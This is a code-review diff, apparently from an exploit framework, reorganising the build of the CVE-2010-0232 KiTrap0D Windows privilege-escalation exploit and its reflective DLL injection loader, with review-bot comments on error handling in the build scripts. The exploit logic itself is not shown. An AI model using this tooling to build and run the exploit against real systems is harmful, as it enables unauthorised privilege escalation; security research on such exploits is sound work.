155
-   PPEB_LDR_DATA pLdr;
156
-   LPVOID lpProcessParameters;
157
-   LPVOID lpSubSystemData;
158
-   LPVOID lpProcessHeap;
159
-   PRTL_CRITICAL_SECTION pFastPebLock;
160
-   LPVOID lpFastPebLockRoutine;
161
-   LPVOID lpFastPebUnlockRoutine;
162
-   DWORD dwEnvironmentUpdateCount;
163
-   LPVOID lpKernelCallbackTable;
164
-   DWORD dwSystemReserved;
165
-   DWORD dwAtlThunkSListPtr32;
166
-   PPEB_FREE_BLOCK pFreeList;
167
-   DWORD dwTlsExpansionCounter;
168
-   LPVOID lpTlsBitmap;
169
-   DWORD dwTlsBitmapBits[2];
170
-   LPVOID lpReadOnlySharedMemoryBase;
171
-   LPVOID lpReadOnlySharedMemoryHeap;
172
-   LPVOID lpReadOnlyStaticServerData;
173
-   LPVOID lpAnsiCodePageData;
174
-   LPVOID lpOemCodePageData;
175
-   LPVOID lpUnicodeCaseTableData;
176
-   DWORD dwNumberOfProcessors;
177
-   DWORD dwNtGlobalFlag;
178
-   LARGE_INTEGER liCriticalSectionTimeout;
179
-   DWORD dwHeapSegmentReserve;
180
-   DWORD dwHeapSegmentCommit;
181
-   DWORD dwHeapDeCommitTotalFreeThreshold;
182
-   DWORD dwHeapDeCommitFreeBlockThreshold;
183
-   DWORD dwNumberOfHeaps;
184
-   DWORD dwMaximumNumberOfHeaps;
185
-   LPVOID lpProcessHeaps;
186
-   LPVOID lpGdiSharedHandleTable;
187
-   LPVOID lpProcessStarterHelper;
188
-   DWORD dwGdiDCAttributeList;
189
-   LPVOID lpLoaderLock;
190
-   DWORD dwOSMajorVersion;
191
-   DWORD dwOSMinorVersion;
192
-   WORD wOSBuildNumber;
193
-   WORD wOSCSDVersion;
194
-   DWORD dwOSPlatformId;
195
-   DWORD dwImageSubsystem;
196
-   DWORD dwImageSubsystemMajorVersion;
197
-   DWORD dwImageSubsystemMinorVersion;
198
-   DWORD dwImageProcessAffinityMask;
199
-   DWORD dwGdiHandleBuffer[34];
200
-   LPVOID lpPostProcessInitRoutine;
201
-   LPVOID lpTlsExpansionBitmap;
202
-   DWORD dwTlsExpansionBitmapBits[32];
203
-   DWORD dwSessionId;
204
-   ULARGE_INTEGER liAppCompatFlags;
205
-   ULARGE_INTEGER liAppCompatFlagsUser;
206
-   LPVOID lppShimData;
207
-   LPVOID lpAppCompatInfo;
208
-   UNICODE_STR usCSDVersion;
209
-   LPVOID lpActivationContextData;
210
-   LPVOID lpProcessAssemblyStorageMap;
211
-   LPVOID lpSystemDefaultActivationContextData;
212
-   LPVOID lpSystemAssemblyStorageMap;
213
-   DWORD dwMinimumStackCommit;
214
-} _PEB, * _PPEB;
215
-
216
-typedef struct
217
-{
218
-	WORD	offset:12;
219
-	WORD	type:4;
220
-} IMAGE_RELOC, *PIMAGE_RELOC;
221
-//===============================================================================================//
222
-#endif
223
-//===============================================================================================//

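--- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c
@@ -10,11 +10,11 @@
  */
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-#include "../common/ReflectiveLoader.c"
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 
 #include <stdio.h>
 #include "../common/common.h"
-#include "../common/LoadLibraryR.h"
+#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
 #include "../common/ResourceLoader.h"
 #include "resource.h"
 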

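--- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
@@ -49,7 +49,7 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
       <Optimization>Disabled</Optimization>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <MinimalRebuild>true</MinimalRebuild>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@@ -81,7 +81,7 @@
       <Optimization>MinSpace</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -121,17 +121,21 @@
       <AdditionalOptions>/ignore:4070</AdditionalOptions>
     </Link>
     <PostBuildEvent>
-      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\"</Command>
     </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemGroup>
-    <ClCompile Include="..\common\LoadLibraryR.c" />
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
     <ClCompile Include="..\common\ResourceLoader.c" />
     <ClCompile Include="kitrap0d.c" />
   </ItemGroup>
   <ItemGroup>
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
     <ClInclude Include="..\common\common.h" />
-    <ClInclude Include="..\common\LoadLibraryR.h" />
     <ClInclude Include="..\common\ResourceLoader.h" />
     <ClInclude Include="resource.h" />
   </ItemGroup>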
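Review bot: In the new multi-line PostBuildEvent (lines 124–128) a failure of `editbin.exe` no longer fails the build: MSBuild takes the exit status of the command script as a whole, which here is that of the final `copy`, and the `&gt; NUL` redirect also hides editbin's output. Appending `|| exit /b 1` to the editbin line (and to the copy line) keeps a DLL with a wrong subsystem/OS-version stamp from being silently copied into `data\exploits\CVE-2010-0232\`. The five-level `..\..\..\..\..\data` path assumes the project's exact position under the repository root, which deserves a short comment next to the copy so the next relocation of the project does not quietly write the artefact somewhere else.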

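--- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters
@@ -2,24 +2,24 @@
  <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <ItemGroup>
     <ClCompile Include="kitrap0d.c" />
-    <ClCompile Include="..\common\LoadLibraryR.c">
-      <Filter>common</Filter>
-    </ClCompile>
     <ClCompile Include="..\common\ResourceLoader.c">
       <Filter>common</Filter>
     </ClCompile>
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
+      <Filter>RDI</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="resource.h" />
     <ClInclude Include="..\common\common.h">
       <Filter>common</Filter>
     </ClInclude>
-    <ClInclude Include="..\common\LoadLibraryR.h">
-      <Filter>common</Filter>
-    </ClInclude>
     <ClInclude Include="..\common\ResourceLoader.h">
       <Filter>common</Filter>
     </ClInclude>
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h">
+      <Filter>RDI</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="kitrap0d.rc" />
@@ -28,5 +28,8 @@
     <Filter Include="common">
       <UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
     </Filter>
+    <Filter Include="RDI">
+      <UniqueIdentifier>{662e77af-b8cd-4717-a3f2-87b2ec57f46c}</UniqueIdentifier>
+    </Filter>
   </ItemGroup>
 </Project>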

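--- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj
@@ -49,7 +49,7 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
       <Optimization>Disabled</Optimization>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <MinimalRebuild>true</MinimalRebuild>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@@ -75,7 +75,7 @@
       <Optimization>MinSpace</Optimization>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>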

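--- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c
@@ -7,7 +7,7 @@
 
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-#include "../common/ReflectiveLoader.c"
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 
 #include <stdlib.h>
 #include "kitrap0d.h"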

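--- /dev/null
+++ b/external/source/exploits/CVE-2010-0232/make.msbuild
@@ -0,0 +1,18 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\kitrap0d.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86" />
+
+  <Target Name="x86">
+    <Message Text="Building CVE-2010-0232 KiTrap0D x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="KiTrap0D is not supported in x64" />
+  </Target>
+</Project>
+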
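Review bot: `Targets="Clean;Rebuild"` on line 11 runs the clean step twice, since Rebuild is already defined as Clean followed by Build; `Targets="Rebuild"` expresses the same intent. The x64 target on lines 14–16 succeeds after only printing a message, so `make.bat x64` exits 0 without producing an artefact; if that is intended for a 32-bit-only exploit, a comment on the target saying so would stop a later contributor from treating it as an unfinished stub.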

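--- /dev/null
+++ b/external/source/exploits/make.bat
@@ -0,0 +1,39 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+
+IF "%1"=="x86" GOTO BUILD_X86
+IF "%1"=="X86" GOTO BUILD_X86
+IF "%1"=="x64" GOTO BUILD_X64
+IF "%1"=="X64" GOTO BUILD_X64
+
+ECHO "Building Exploits x64 and x86 (Release)"
+SET PLAT=all
+GOTO RUN
+
+:BUILD_X86
+ECHO "Building Exploits x86 (Release)"
+SET PLAT=x86
+GOTO RUN
+
+:BUILD_X64
+ECHO "Building Exploits x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+
+:RUN
+ECHO "Building CVE-2010-0232 (KiTrap0D)"
+PUSHD CVE-2010-0232
+msbuild.exe make.msbuild /target:%PLAT%
+POPD
+
+FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
+SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
+echo Finished %ldt%
+
+GOTO :END
+
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+
+:END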
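Review bot: The msbuild call on line 26 is not checked, so a failed build still prints `Finished ...` and the script exits 0, which hides the failure from any caller or CI job; `msbuild.exe make.msbuild /target:%PLAT% || (POPD & EXIT /B 1)` propagates it. `PUSHD CVE-2010-0232` on line 25 is relative to the caller's working directory rather than the script's location, so `PUSHD "%~dp0CVE-2010-0232"` lets it run from anywhere. The NEED_VS branch on lines 35–37 also falls through to :END with a zero exit code; an `EXIT /B 1` after the second ECHO lets a caller detect the missing environment. The `ECHO "..."` lines print the quote characters literally; the usual form is `ECHO Building Exploits x86 (Release)` without quotes.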
